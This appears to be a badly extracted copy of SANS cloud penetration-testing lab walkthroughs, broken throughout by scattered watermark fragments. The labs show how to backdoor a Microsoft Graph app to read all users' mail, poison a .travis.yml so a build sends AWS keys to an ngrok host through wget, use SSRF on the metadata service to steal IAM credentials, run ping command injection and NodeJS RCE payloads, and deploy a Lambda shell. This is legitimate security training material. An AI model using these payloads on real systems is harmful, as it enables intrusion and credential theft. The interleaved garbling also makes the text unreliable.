SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
Microsoft Graph is a new SDK and API that allows for a programmable way to access Microsoft Speci c
ly
Services.While Microsoft Graph has been around in some form for a while. It was never more important or
Ju
relevant than when the CEO of Microsoft has "deprioritized" Windows for Microsoft Graph Microsoft Graph
>
(http://bit.ly/2SDgAqO) .
om
_c
Microsoft Graph while powerful is not as simple as it may seem. Permissions for Microsoft Graph are critical
ok
and for full on Application. We will be playing around with understanding how these API keys can be built and
what can be done with it.
23169600 @
ou
tlo
What is more alarming is the amount of con dent, sensitive or otherwise information is still being
66
private
emailed as part of the Operational Processes of an organization. What we are going to do in this Lab is Data
s1
Gregg Harris
au
A web browser
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G:
Try It Yourself
To
d
se
live
2. Find the Postman App Registration in Azure Active Directory
3. Using the Postman App, create a Client Secret using StudentX-Postman .
4. Con gure Postman to connect to Microsoft Graph and Query Summer's email.
5. Once you have Summer's email try and download the le in a sensitive email.
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Navigate to https://portal.azure.com and login as jerry@sec588.com with his account. Once you you
s1
Gregg Harris
au
<p
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
We have pre-built a Postman Application for you, consider that this could be an internal application, it could be
called anything. It could even be a Microsoft PowerBI or a Microsoft Graph Application in house. Either way you
First let's note a few items in the main page, record the following:
3e1e3b497543e6c11ac8e4188959c93e
Application (client) Id
Directory (tenant) Id
20
20
Now let's click on API Permissions. Here we can see that this App has a few Elevated permissions:
,
28
pauljones166@outlook_com
ly
Files.Read : This is a User based Permission, applies to whoever owns this application, it will read the Files
Ju
for the user in OneDrive.
>
om
User.Read : This is a User based Permission, applies to whoever owns this application, it will read the user
_c
information.
ok
There are other permissions: 23169600 @
ou
tlo
66
Mail.Read.All : This is a Application based Permission, applies globally and will read ALL users mail.
s1
ne
Files.Read.All : This is a Application based Permission, applies globally and will read ALL users les in
ljo
OneDrive.
Gregg Harris
au
<p
Users.Read.All : This is a Application based Permission, applies globally and will read ALL the users in the
s
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
How can we backdoor this access and get access to the API? Let's add our own Client Secret to start, Navigate to
the Certificate & Secrets Menu . From within this menu Add a New Client Secret, for One Year and
Name it
3e1e3b497543e6c11ac8e4188959c93e
Armed with these values we can now con gure Postman.
20
Let's open the MATE terminal so that we can launch Postman
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
$ cd /opt/postman
ce
Li
$ ./Postman
live
We will need to download and install the collection. To do so visit this link:
https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
3e1e3b497543e6c11ac8e4188959c93e
collections/master/Microsoft%20Graph.postman_collection.json
(https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
collections/master/Microsoft%20Graph.postman_collection.json)
20
https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
20
collections/master/Microsoft%20Graph.postman_environment.json
(https://raw.githubusercontent.com/microsoftgraph/microsoftgraph-postman-
,
28
pauljones166@outlook_com
collections/master/Microsoft%20Graph.postman_environment.json)
ly
Ju
To import them use the Import function of Postman.
>
om
From here click 'Import' and enter the URL'
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
ClientSecret
3e1e3b497543e6c11ac8e4188959c93e
TenantId
And there are two that you do not have, the rst one is AppAccessToken and the second is
20
UserAccessToken .
, 20
28
pauljones166@outlook_com
Let's ll these in as the CURRENT VALUE and make sure to hit ENTER after each value is put in.
ly
Ju
ClientId will be the value: Application (client) Id
>
om
TenantId will be the value: Directory (tenant) Id
_c
ok
The ClientSecret
in the these values.
will be the
23169600
one time token
@
ou
tlo
that you created as the Student1-Postman secret. Put
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
Let's create a new request, click the + to open a new tab and make a POST request to:
https://login.microsoftonline.com/{{TenantID}}/oauth2/v2.0/token
3e1e3b497543e6c11ac8e4188959c93e
x-www-form-urlencoded
The URL Encoded area will need a few rows to be added These are case sEnSiTiVe
20
20
Key: grant_type Value: client_credentials
,
28
pauljones166@outlook_com
ly
Key: client_id Value: {{ClientID}}
Ju
>
Key: Value:
om
client_secret {{ClientSecret}}
_c
Key: Value:
ok
scope https://graph.microsoft.com/.default
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
In the bottom of the response you should see a JSON array with the value:
:G
To
"access_token" and its value in the " copy the value without the " . This is your AppAccessToken .
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
Using Graph to nd Emails.
_c
ok
You can play with any of the queries you want. The way you will run a query is to use one of the ones you have
23169600
Permission to that is either "Mail" or "Users". @
ou
tlo
For Mail, let's click Get a Users Messages . This will get all the messages of a speci c user.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
If you look at the URL it shows {{UserId}} . Clicking send now will give you an error because the
gg
{{UserId}} is blank. If we wish to use this click the Eyeball once again, and under Current Value , let's put in
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
summer@sec588.com .
: G
To
d
n se
ce
Li
live
If you look at the JSON carefully let's take a look at some area:
3e1e3b497543e6c11ac8e4188959c93e
bodyPreview : Summer this is sensitive
20
20
sender : George Georgeson, a Global Admin.
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
Summer recieved some type of special le, and I would assume that this is potentailly useful for us to have.
<p
Since we have Summer's username and password we can login and retrieve this le. If not we would need to nd
s
a di erent way.
rri
Ha
jerry
users or login as summer .
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
You can locate the email message now and even download the le which is an SSH key. Keep this key for a
To
future lab.
d
se
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
Conclusion
>
om
There are tools today like mailsniper that are designed to use the O ce365 API's to try and extract emails
_c
from the system. As the Microsoft Graph API and other similar API's are universally built at Microsoft we will
ok
need to keep an eye on the API's. There may not be a tool designed to harvest this information day one, but
23169600
ability to abuse these sources of information.
@
ou
tlo
understanding how the tool will work by using Developer Focused tools like Postman could help us expedite the
66
Microsoft Graph is a treasure trove of information. While you may not have direct access to all of the sources of
ljo
Gregg Harris
data directly, you could attempt to indirectly access the system by leverage the Microsoft Graph API in a pseudo
au
out of band way. It would be ideal if Administrators always look at where they have deployed keys and rotate
<p
them often.
s
rri
Ha
Additional Resources
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
:G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
The CI/CD Pipeline is a critical part of the software supply chain. CI is for Continious Integration and CD is for
ly
Continous Delivery. The word Continous is only possible through Automation. If you can poison or nd your
Ju
way into a CI/CD Pipeline you can start to very much harm a system and introduce many attack vectors. This lab
>
does not demonstrate a full payload attack because terms of service in the CI pipeine may be violated, however
om
we will demonstrate extraction of sensitive data supplied by the author.
_c
ok
Requirements for This Lab
23169600 @
ou
tlo
This lab will require you to have complete the Microsoft Graph Lab, you will also need the following items.
66
s1
ssh
ne
ngrok
ljo
A working
Gregg Harris
python environment
au
git
<p
An Internet Connection
s
rri
Ha
Try It Yourself
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
To attempt this lab yourself you must do the following items:
:G
To
Walkthrough
To get started with will begin by using the SSH key that we have found in our Email in Section 3.7. If you recall
you downloaded it as:
3e1e3b497543e6c11ac8e4188959c93e
day4
20
When we do this step our wiki-updater.sh will break you need to restore this script for it to continue to work.
, 20
28
pauljones166@outlook_com
This le should be located in /home/sec588/Downloads .
ly
Ju
>
Let's open the MATE terminal so that we can modify some settings
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
Once the terminal is open type the following commands:
$ cp /home/sec588/Downloads/day4 /home/sec588/.ssh/day4
$ cd /home/sec588/.ssh/
3e1e3b497543e6c11ac8e4188959c93e
We also need to modify the con g le.
$ nano config
20
20
The le will ship like this:
,
28
pauljones166@outlook_com
ly
Ju
host github.com
>
om
Hostname github.com
IdentityFile ~/.ssh/sec588-wiki-vm-keys
_c
User git
ok
23169600 @
ou
tlo
Given that international keyboards do not necessarily support ~ let's do two things, remove the IdentityFile
66
Gregg Harris
au
host github.com
<p
Hostname github.com
#IdentityFile ~/.ssh/sec588-wiki-vm-keys
s
IdentityFile /home/sec588/.ssh/day4
rri
User git
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
We can now use the SSH Con guration to push and pull items. While we could spend days or weeks guring out
Li
live
what this le does, we are going to shortcut this process by telling you that this key will allow you to deploy into a
speci c repository, so let's play with this. The rst thing we will do is pull the repository down:
$ cd /home/sec588/files/workdir
This will allow you to clone down the repo for this lab. The next thing you will need to do is modify the git
3e1e3b497543e6c11ac8e4188959c93e
repository so that you can push changes:
$ git remote -v
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 tlo
This will allow you to 'checkout the current setting'. Let's change it to SSH:
@
ou
$ git remote set-url origin git@github.com:mosesrenegade/sec588-day4
66
s1
Gregg Harris
au
$ git remote -v
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
At this point we are ready to look at our les. Switch directory into the sec588-day4.
n se
ce
$ cd sec588-day4
Li
live
We have two les that could be useful. The rst one is 'Docker le', we could poison this le with a backdoor.
Instead what we will concentrate on is extracting inforrmation from the .travis.yml.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
connect to a private repository or maybe more. Let's show you how to obtain it.
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
ngrok window
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
simplehttpserver window
:
To
d
se
day4 window
n
ce
These are the three windows that we will have are shown below.
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
In the ngrok window you will see the following line:
_c
ok
Forwarding http://<randomurl> -> http://localhost:8888
23169600 ou
tlo
Record the random url, this is your internet address that will forward all tra c to your local computer.
@
66
Gregg Harris
au
<p
After we have a new branch, the next thing we will do is open .travis.yml le you can use nano or whatever
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
$ nano .travis.yml
: G
To
Look at the travis le, speci cally right after the section that reads:
d
n se
ce
Li
after_success:
- docker --version
live
What we will do is modify it to read the following:
after_success:
3e1e3b497543e6c11ac8e4188959c93e
- echo $AWS_ACCESS_KEY_ID
- wget http://ngrok-randomurl/`echo $AWS_ACCESS_KEY_ID`
20
We can now commit or branch to the github repository which should start a build:
, 20
28
pauljones166@outlook_com
$ git add .
ly
Ju
You can put anything you want in the comment:
>
om
$ git commit -m 'Our Fun Commit'
_c
ok
$ git push origin studentX
23169600 @
ou
tlo
This will push our repository into github. It may take up to 5 minutes to create the build but what should occur is
66
a push into the URL that will read out an environment variable, in our case, AWS_ACCESS_KEY_ID .
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Conclusions
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
The ability for us to valiate and understand the changes that occur in the most sensitive parts of our
:
To
infrastructure environments will be pandemount to understanding what is occuring in the overall architecture.
d
Are defenders monitoring the most sensitive and critical les in their network? Is there something that they can
se
do to make the environment better? This includes modi cations to Docker les and .travis.yml les which are
n
ce
live
Remember you will need to revert the con g le to update the wiki:
$ nano /home/sec588/.ssh/config
3e1e3b497543e6c11ac8e4188959c93e
host github.com
Hostname github.com
IdentityFile ~/.ssh/sec588-wiki-vm-keys
#IdentityFile /home/sec588/.ssh/day4
20
User git
, 20
28
pauljones166@outlook_com
This will allow wiki-updater.sh to work.
ly
Ju
>
Why This Lab Is Important
om
_c
ok
This is important as more repositories become breached, more environment libraries are being moved from
23169600
developers to hackers, and more keys are exposed. Demonstrating the true impact to an organization is critical
tlo
for us to understand how attackers are taking over infrastructures and abusing the trust they have placed in
many of their own deployment system.
@
ou
66
s1
Additional Resources
ne
ljo
Gregg Harris
SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
20
This lab showcases the impacts of SSRF, this particular bug allows us to gain access into an environment by
using the Web Application as a proxy to internal web applications. This would grant the user the capability of
20
moving around an environment in a predictable way. One of the more important components of this would be to
,
28
pauljones166@outlook_com
take this, add consistently ask for URL's in the applications to see if they exist. We can even inspect locally served
les if we know what they are or can guess them.
ly
Ju
>
Remember Micro Services and Cloud Native Applications use HTTP/HTTPS as an internal transport protocol for
om
many of its services. Using the SSRF we can even start to look for other endpoints if we know what they are.
_c
ok
We will also attempt to cause and error, the error output of our lab will show up what type of application this
really is.
23169600 ou
@
tlo
Requirements for This Lab
66
s1
ne
Gregg Harris
au
A working internet connection, and access to the VM Browser and access to cURL.
<p
s
rri
Try It Yourself
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
You will be getting the AWS Keys to an EC2 worker node using the meta-data service from within a container.
:
To
d
1. Go to
se
invoice.<class-subdomain>.sec588.net
n
ce
live
3. Find the URL that is located in the homepage that is '/url'
4. Look at the URL GET Request and attempt to execute a SSRF by:
20
Getting started
, 20
28
Most of the labs in the Cloud Native Day are based on MicroServices, our endpoint will be the following:
pauljones166@outlook_com
ly
Ju
http://invoice.<class-subdomain>.sec588.net
>
om
Open refox and let's take a look at this particular site.
_c
ok
This application is built of multiple containers and much like our picture, we will try and uncover the di erent
components. 23169600 @
ou
tlo
The rst thing that we will do in our application is look at the way that SSRF's are designed, on the web page you
66
will see a link to a /url. Click the link and it should take you to the following url:
s1
ne
DO NOT CLICK ON THIS LINK BELOW, it will be different for your class
ljo
Gregg Harris
au
If you use a web browser for the step below it will FAIL, as the way the SSRF triggers may or may
<p
http://invoice.<class-subdomain>.sec588.net/url?url=http://localhost:8080/static/ssrf.html
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
Let's trigger an error, for this step and this step only we will not browser
3e1e3b497543e6c11ac8e4188959c93e
Also note if this hangs, CTRL-C and try again
The URL shows up with the following items: url?url=hrl?url=http://localhost:8080/ and what this tells
the library is that our URL is purposefully malformed but the trailing / allows the system to execute this.
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
This will fail, but what is more interesting is that a DEBUG message appears
_c
ok
What we will see if output that looks like a stacktrace and debug line. Some of the words we will need to pay
attention to:
23169600 @
ou
tlo
requests.exceptions
66
s1
/usr/local/lib/python3.6/
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
All of these are indicators that we are running in a python based container. We may need this information later.
live
Let's see how this bug will impact us, rst we should note that many default webservers do not run on a 'root'
level port, or that is a port that is below 1024. We happen to see many servers running in ports like 8000,
8080,8443, etc. We are going to start by guessing that this environment could be 8080 as the python stack trace
showed it to be running ask. Flask is commonly run on port 8080. Let's look:
This should push our own local webserver into our page. A page within our page, inception. Remember back to
3e1e3b497543e6c11ac8e4188959c93e
Day2 with our IAM and escalation examples, maybe this container is running a cloud provider, maybe within
EC2, or maybe within GCP. What we can start to understand is weather we have the capability to browser other
internal pages using this page as a le reader. We do not yet know what the actual pages are, for that we will
need a di erent bug. Let's however see if we can get, futher into the environment.
20
20
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-data/
,
28
pauljones166@outlook_com
From this point you should be looking at a nice view for the meta-data API. Let's explore what we know about this
ly
host:
Ju
>
om
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-
_c
data/hostname
ok
The hostname of this device is:
23169600 @
ou
tlo
ip-192-168-<XX-YYY>.us-east-X.compute.internal
66
s1
We can see this node is running in an ip range of 192.168.X.X in the us-east-1 datacenter. What else can we
ne
learn:
ljo
Gregg Harris
au
<p
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-
data/public-hostname
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
We could also get an indiciation of the type of device by looking at security-group names and some other items:
:G
To
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-
d
data/security-groups
se
n
ce
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-
Li
live
data/iam/info
Each one of these queries have details about thet type of device, the words 'eks' or 'eksctl' may give us some
indication
3e1e3b497543e6c11ac8e4188959c93e
This will display the name of role that we wish to query
http://invoice.<class-subdomain>.sec588.net/url?url=http://169.254.169.254/latest/meta-
data/iam/security-credentials/<rolename>
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
If you have additional time
23169600 ou
tlo
Attempt to make these command execute through command line tools such as:
@
66
curl
s1
ne
Gregg Harris
au
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
This lab begins our Cloud Native Day, one of the core components of a cloud native application is its capability to
G
properly handler URL inputs. We will see how this is impacting our tests going forward with the other
:
To
Additional Resources
ce
Li
live
SANS SEC642: Advanced Web Application Penetration Testing (https://www.sans.org/sec642)
20
,20
28
pauljones166@outlook_com
Brief Intro
ly
Ju
>
Command Injection bugs are quite common given the amount of work that command line tools a ord us. Even
om
when command line tools are not directly called, we can manipulate existing software to inject operating system
_c
commands for us to use. We will be exploring two services in this lab. The /ping service and the invoice service.
ok
23169600 tlo
One thing about these containers, they unlike the last system, are not running python.
@
ou
66
Gregg Harris
au
Try It Yourself
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
If you wish to try this on your own:
G:
To
1. You will nd that within the http://invoice.<class-subdomain>.sec588.net lab there are multiple
d
endpoints.
n se
ce
live
3. Using base64 pull out the contents of the ping.php le on the system to obverse what the vulnerability is
5. Find a way to execute commands through an RCE in NodeJS, the functions is in the invoice search area.
3e1e3b497543e6c11ac8e4188959c93e
a. Can you manipulate javascript in this post?
b. As this is actually as these commands are running in a URL, what do you have to modify to execute code?
20
20
c. Can you look through the le system? Can you run any commands?
,
28
pauljones166@outlook_com
ly
Walkthrough
Ju
>
om
Direct Command Injection
_c
Let's open our Web Browing interface one more time.
ok
23169600
$firefox http://invoice.<class-subdomain>.sec588.net
@
ou
tlo
66
This time we will be look at two URL endpoints, the rst one is our /ping process.
s1
ne
If we click on it we can enter anything we want to ping. Ping localhost on the machine
ljo
Gregg Harris
au
127.0.0.1
<p
s
rri
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
By running this command we should also notice that we may be able to trigger additional commands:
>
om
Hit the Back icon on the brower and let's try this:
_c
ok
127.0.0.1; ls
23169600
The output should re ect something like:
@
ou
tlo
66
Gregg Harris
au
<p
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
ping.php
n
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
We now see at the bottom of the page a new item ping.php
_c
ok
It would appear our container is running a php process called ping. We can do a few things here.
Gregg Harris
au
<p
========
Ha
gg
ping.php
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
We cannot however view the contents of the php le:
_c
ok
127.0.0.1; echo "============"; cat ping.php
23169600 ou
tlo
This will not show us anything. Why? Becuase the PHP Engine is processing the php commands as code.
@
66
Gregg Harris
au
<p
We now can see a base64 encoded string. What you will see is something like this:
s
rri
Ha
========
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
With this string in hand you can decode it. Open a MATE Terminal and copy the string like so:
om
_c
ok
$echo "PD9waHAKJHN5c3RlbT0kX0dFVFsnc3lzdGVtJ107CnN5c3RlbSgicGluZyAtYzIgJHN5c3RlbSIpOwo/Pgo=" |
base64 -d
23169600 @
ou
tlo
Note that the system will break up the string you need to make it all appear in one single line to work.
66
s1
As we can see this a very simple way of getting access to both source code and the ability to smuggle out items.
ne
ljo
Let's explore what is on this container, type in the following commands to try:
Gregg Harris
au
<p
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
127.0.0.1; echo "============"; which curl
:G
To
We can see that the has some interesting items that we may wish to explore in the future.
n
ce
Li
invoice.<class-subdomain>.sec588.net
3e1e3b497543e6c11ac8e4188959c93e
What we see is some information on the screen. The name of container as well as the invoice date.
20
, 20
28
pauljones166@outlook_com
Let's now attempt the same command injection technique, attempt to type:
ly
1%3Bls
Ju
>
om
This should provide us with an error, if it does not come back right away, restart the request. It may also be
_c
helpful to run this in the command line with curl in case the system is not responding which happens from
ok
time to time.
--data "invoiceid=1%3B+ls"
s1
ne
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
NodeJS is not the same as many of the other systems in that is can shell out directly. Instead it will require a shell
G
to be constructed out of a set of NodeJS code and the return on that execution must be handled or the injetion
:
To
Using the fs library you can do the following: To ls a directory you would want to use:
n
ce
One thing to note is that the default programming pattern in NodeJS to a request and response is to use the
words res and req so we will need to end the response and in the ending of the response, start a new
request. It will look strange.
3e1e3b497543e6c11ac8e4188959c93e
Alternatively in cURL: $ curl -X POST http://invoice.<class-subdomain>.sec588.net --data
"invoiceid=res.end(require('fs').readdirSync('.').toString())"
20
20
,
28
pauljones166@outlook_com
This should output us a list of les in a directory.
ly
Ju
Note the text will look like HTML!
>
om
You may see words appear like Dockerfile,index.js,node_modules and the like.
_c
ok
This particular container may have shipped with a Docker le, let's read it:
Alternatively in cURL:
s1
"invoiceid=res.end(require('fs').readFileSync('Dockerfile').toString())"
ljo
Gregg Harris
au
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
What happens if we try and read the root of the lesystem? In the browser enter:
nse
res.end(require('fs').readdirSync('/').toString())
ce
Li
It will more than likely fail, the url shows us the following: http://expected-invoice-
svc.default.svc.cluster.local:8080/api/expected-
date/res.end(require('fs').readdirSync('/').toString())
3e1e3b497543e6c11ac8e4188959c93e
In the browser enter: res.end(require('fs').readdirSync('%252F').toString())
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
How can we triggering command execution this way?
om
_c
$ curl -X POST http://invoice.<class-subdomain>.sec588.net --data
ok
"invoiceid=res.end(require('child_process').execSync('ls').toString())"
23169600 ou
tlo
Alternatively if we only had the ability to read and write to the le system we could use this command:
@
66
s1
Please note we are using a random le name because multiple students will be attacking the same host. The
ne
general task her is to put our return values in a le like so: "ls > random_ le_name" where "random_ le_name" is
ljo
Gregg Harris
au
<p
s
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
"invoiceid=res.end(require('fs').readFileSync('<same as the above command random
G
name>').toString())"
:
To
d
Now we have a very rudamentary RCE. We can from here go further, such as reading environment variables and
se
more. Is this pretty? No, no one would actually want to hack this way for long, however it does get us the access
n
ce
we need.
Li
live
With this level of access we now have 2 remote code executions and an SSRF bug, this will provide us with the
beginnings of a way to get deeper into a web application.
3e1e3b497543e6c11ac8e4188959c93e
Additional Resources
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
While command injection and SSRF's are attacks that plague a wide number of applications, and allow for
ly
internal pivots, Serverless functions themselves can allow us to move around the environment.
Ju
>
In this lab we are going to introduce you to a serverless environment where we can upload a javascript NodeJS
om
function that will give us a full le shell.
_c
ok
Requirements for This Lab
23169600 @
ou
tlo
This lab requies the student to have:
66
s1
Gregg Harris
au
Try It Yourself
<p
s
rri
1. You should be using the same aws credentials from Lab2.5 for this lab. (pro le named lab25 )
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
2. SSH into the IP addess from Lab2.5 that has the ec2-kms-role .
G
Walkthrough
ce
Li
3e1e3b497543e6c11ac8e4188959c93e
ssh -i /home/sec588/files/workdir/studentX-<class-subdomain>.pem ubuntu@<ip from section2>
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-kms-role-<class-
subdomain>
20
This command does the following:
,20
28
SSH into the host as the ubuntu user
pauljones166@outlook_com
Get access to the IAM MetaData service through cURL.
ly
Ju
With this session token we can now deploy a lambda function. We have provided a lambda shell function in the
>
om
IAM so that you can explore how to execute a shell within a Lambda function.
_c
ok
Editing the project le
23169600 ou
tlo
We need to rst gure out our IAM Role that we are using, one way is to run a command like so:
@
66
This WILL fail, but it will give you the information needed to proceed.
Gregg Harris
au
<p
You will see an error that shows that command was not successful, but it will also show you the IAM ARN:
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
The information you will need is:
:G
To
The <account-id>
d
With this role noted, we can now use pieces of this information correctly.
Li
Our example shell is located at /opt/lambda-shelllive to use it we need to make a few changes:
3e1e3b497543e6c11ac8e4188959c93e
Second there is a line that reads the role, the role should be: arn:aws:iam::<number>:role/ec2-kms-role-
<class-subdomain>"
20
You will need to validate a few things:
, 20
28
pauljones166@outlook_com
The account is valid
ly
The <class-subdomain> role is valid
Ju
>
If they are we can then move to run and execute the role.
om
_c
Executing our shell
ok
23169600
First we need to deploy our shell to a new lambda function: @
ou
tlo
66
$ cd /opt/lambda-shell
s1
ne
Gregg Harris
au
It should nish, if it does then we can execute it using our looping function:
<p
s
$ ./lambda-shell
rri
Ha
With the lambda-shell running we are now able to run some commands and explore.
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Type:
G
ls
:
To
This will take a few minutes to run as the lambda function will need to deploy and execute. After it is deployed
d
se
you can now run with a much faster motion as it is a warm started condition.
n
ce
One of the things about Lambdas that you may notice right away is that many of them may not have the IP
Li
You will probably see that you are running as a random lower privileged sandbox user.
3e1e3b497543e6c11ac8e4188959c93e
As a matter of fact this particular container may actually be Amazon Linux:
20
20
You will see that it is of: Amazon Linux 2 (Karoo)
,
28
pauljones166@outlook_com
ly
One again we are challenged with some items like are we able to move laterally, and the answer will depends on
Ju
a few things:
>
om
1. What IAM Privileges do we have with the Lambda
_c
2. What VPC is the Lambda in
ok
3. What else can the Lambda do?
23169600 ou
tlo
Because we are executing and creating this lambda ourselves it is not the same as an already running lambda
@
that can do command execution.
66
s1
